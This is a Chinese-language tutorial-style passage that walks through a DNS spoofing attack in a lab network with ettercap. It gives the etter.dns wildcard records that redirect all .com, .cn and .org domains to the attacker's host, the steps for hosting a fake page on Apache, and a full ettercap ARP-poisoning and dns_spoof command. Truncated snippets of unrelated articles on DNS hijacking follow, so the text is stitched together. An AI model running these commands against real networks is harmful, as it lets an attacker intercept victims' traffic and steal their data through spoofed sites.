攻擊者 kali ip:192.168.5.128
受迫者 win7 ip:192.168.5.129
首先配置ettercap
leafpad /etc/ettercap/etter.dns
* a 192.168.5.128
*.com a 192.168.5.128
*.cn a 192.168.5.128
*.org a 192.168.5.128
設定劫持後網頁模樣
leafpad /var/www/index.html
service apache2 start
(啟動apache2 伺服器)
1、ettercap -g
(開啟ettercap )
選擇dns_spoof外掛程式
sniff eth0選項,開啟host list 搜尋host ,新增閘道器和相應的機器
機器加入到攻擊者1 網管加入到攻擊者2 然後選擇中間人攻擊arp
勾選sniff remote connections已達到監聽的目的。
start sniff 開始攻擊
2、ettercap -t -q -i eth0 -p dns_spoof -m arp /192.168.5.2/ /192.168.5.129/
DNS劫持 流量劫持,HTTP HTTPS劫持
dns劫持 dns劫持就是通過劫持了dns伺服器,通過某些手段取得某網域名稱的解析記錄控制權,進而修改此網域名稱的解析結果,導致對該網域名稱的訪問由原ip位址轉入到修改後的指定ip,其結果就是對特定的 不能訪問或訪問的是假 從而實現竊取資料或者破壞原有正常服務的目的。dns劫持通過篡改dns伺服器上...
dns劫持分析
最近在做dns解析,關注的重點在查詢網域名稱ns記錄上,異常日誌中捕獲到乙個網域名稱,dig查詢 查詢請求型別為ns,dig結果卻只有一條a記錄。出於好奇,查詢型別改為a型別 這個網域名稱dig 查詢 a記錄,返回一條結果,但是每次 dig下去結果都不大一樣。回到最開始的問題,請求型別為ns,dig...
DNS 劫持和DNS 汙染
dns 是domain name server 的簡稱。當然如果你搜尋到這篇文章,那麼我猜測你可能對dns也有一定的了解了。所以對dns的基本知識我就不在介紹了。舉個例子,說到劫持,我們可能聯想到乙個壞蛋劫持了dns伺服器,拿著刀架在脖子上。這時候你問dns伺服器,博主帥嗎?發出請求 dns伺服器聽...